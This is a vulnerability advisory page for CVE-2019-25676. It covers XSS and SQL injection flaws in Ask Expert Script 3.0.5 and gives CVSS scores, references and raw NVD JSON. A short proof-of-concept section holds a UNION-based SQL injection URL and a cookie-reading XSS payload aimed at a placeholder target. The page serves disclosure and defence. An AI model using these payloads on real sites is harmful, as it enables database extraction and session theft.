CVE-2019-25676

Description

Ask Expert Script 3.0.5 contains cross-site scripting and SQL injection vulnerabilities that allow unauthenticated attackers to inject malicious code by manipulating URL parameters. Attackers can inject script tags through the cateid parameter in categorysearch.php or SQL code through the view parameter in list-details.php to execute arbitrary code or extract database information.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpscriptsmall:ask_expert_script:3.0.5:*:*:*:*:*:*:* - VULNERABLE

Ask Expert Script 3.0.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# SQL Injection PoC in list-details.php
# Attacker can extract database version using UNION based SQL injection
sqli_payload = "http://target.com/list-details.php?view=-1' UNION SELECT 1,2,version(),4-- -"

# XSS PoC in categorysearch.php
# Reflected XSS via cateid parameter
xss_payload = "http://target.com/categorysearch.php?cateid=<script>alert(document.cookie)</script>"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25676
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25676
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25676/
[4] VulDB https://vuldb.com/cve/CVE-2019-25676
[5] http://www.phpscriptsmall.com/
[6] https://www.exploit-db.com/exploits/46426
[7] https://www.vulncheck.com/advisories/ask-expert-script-cross-site-scripting-sql-injection

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25676", "sourceIdentifier": "[email protected]", "published": "2026-04-05T21:16:45.620", "lastModified": "2026-04-20T17:53:43.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ask Expert Script 3.0.5 contains cross-site scripting and SQL injection vulnerabilities that allow unauthenticated attackers to inject malicious code by manipulating URL parameters. Attackers can inject script tags through the cateid parameter in categorysearch.php or SQL code through the view parameter in list-details.php to execute arbitrary code or extract database information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpscriptsmall:ask_expert_script:3.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "A1FACEB3-C2DC-4757-8C0F-700BAD59DE05"}]}]}], "references": [{"url": "http://www.phpscriptsmall.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46426", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/ask-expert-script-cross-site-scripting-sql-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}